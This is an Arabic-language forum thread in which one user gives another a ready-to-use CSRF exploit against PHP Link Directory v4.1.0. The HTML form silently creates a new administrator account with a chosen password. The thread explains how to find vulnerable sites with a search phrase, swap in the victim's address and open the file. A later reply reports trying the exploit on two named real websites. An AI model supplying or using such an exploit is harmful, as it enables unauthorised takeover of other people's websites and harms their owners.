اخوانى لقيت الثغاره هذا بس ما عرفت كيف استفيد منها
http://www.expbase.com/WebApps/13742.html
ممكن شرح بسيط
كتابي او با الصور
وشكرااااااااا

والله انا زيك

بس اخوي ابي استفسرك كيف خلي الخط حق الموضوع كبير

السلام عليكم
الموضوع ليس في قسمه المناسب
لكن
ابحث عن المواقغ بالدروك Powered by: PHP Link Directory
اختر موقع
و انسخ هدا الكود
<html>
<head>
<title>PHP Link Directory v4.1.0 [Add Admin]</title>
</head>
<H2>CSRF Add Admin By AtT4CKxT3rR0r1ST</H2>
<form method="POST" name="form0" action="http://localhost/admin/conf_users_edit.php?action=N">
<input type="hidden" name="LOGIN" value="webmaster"/>
<input type="hidden" name="NAME" value="Mohammad Hussien"/>
<input type="hidden" name="PASSWORD" value="123456"/>
<input type="hidden" name="PASSWORDC" value="123456"/>
<input type="hidden" name="LANGUAGE" value="sq"/>
<input type="hidden" name="EMAIL" value="[email protected]"/>
<input type="hidden" name="cemail" value="1"/>
<input type="hidden" name="LEVEL" value="1"/>
<input type="hidden" name="formSubmitted" value="1"/>
<input type="hidden" name="id" value=""/>
<input type="hidden" name="exclude_id" value=""/>
</form>

وضعه في ملف نصي جديد و احفظه بصيغة html


عوض http://localhost االموقع المصاب

Mohammad Hussien

باسم المدير الادمن الجديد
و العدد 123456 الباسوورد الجديد
و احفظ الملف
ا وفتحه في المتصفح
وشوف النتيجة مرضية جدا
تحياتي لك

اخي انا ماني فاهم هذا الكلام

عوض http://localhost االموقع المصاب

Mohammad Hussien

باسم المدير الادمن الجديد
و العدد 123456 الباسوورد الجديد
و احفظ الملف
ا وفتحه في المتصفح
وشوف النتيجة مرضية جدا
تحياتي لك

ارجو التوضييح

مشكور اخى على الشرح بس النتيجة كانت
CSRF Add Admin By AtT4CKxT3rR0r1ST هذا ما يظهر لي
والتجربة كانت على
http://poweredbyphpld.com/
http://www.republicapr.com/

مشكوررررررررررررررررررررر ررررررررررر

جزاك الله خير

مشكوووووووووووووورررررررر ررررررررررررررررررررر